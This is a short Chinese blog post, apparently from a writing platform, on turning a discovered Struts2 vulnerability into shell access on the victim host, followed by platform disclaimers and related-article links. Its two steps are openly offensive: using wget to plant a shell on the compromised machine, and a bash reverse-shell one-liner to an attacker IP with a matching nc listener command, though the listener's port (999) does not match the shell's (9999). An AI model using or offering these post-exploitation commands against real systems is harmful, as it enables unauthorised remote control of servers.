從struts2漏洞到getshell思路

思考:

利用常見的struts2漏洞檢查工具發(fā)現(xiàn)有漏洞后該如何進一步操作呢?

參考思路:

1、wget下載shell到受害主機上進行操作

2、利用bash 反彈一個shell,用nc連接(受害主機上執(zhí)行 bash -i >& /dev/tcp/192.168.1.1/9999 0>&1,攻擊者的主機上執(zhí)行 nc -lvnp 999)


?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
【社區(qū)內容提示】社區(qū)部分內容疑似由AI輔助生成,瀏覽時請結合常識與多方信息審慎甄別。
平臺聲明:文章內容(如有圖片或視頻亦包括在內)由作者上傳并發(fā)布,文章內容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關閱讀更多精彩內容

  • 官網 中文版本 好的網站 Content-type: text/htmlBASH Section: User ...
    不排版閱讀 4,737評論 0 5
  • 背景 前段時間因為使用Flink默認配置,沒有禁用通過web上傳jar包提交作業(yè)的功能,同時服務器配有公網地址,也...
    AI貓頭鷹閱讀 1,439評論 0 0
  • S2-005漏洞S2-005是由于官方在修補S2-003不全面導致繞過補丁造成的。我們都知道訪問Ognl的上下文對...
    能飲一杯無_5d3a閱讀 4,119評論 1 0
  • 作者:Gilberto Najera-Gutierrez譯者:飛龍協(xié)議:CC BY-NC-SA 4.0 簡介 這章...
    三月行者閱讀 1,974評論 2 7
  • 運行操作 CMD命令:開始->運行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本、文件系統(tǒng)版本) CM...
    小明yz閱讀 3,010評論 0 8

友情鏈接更多精彩內容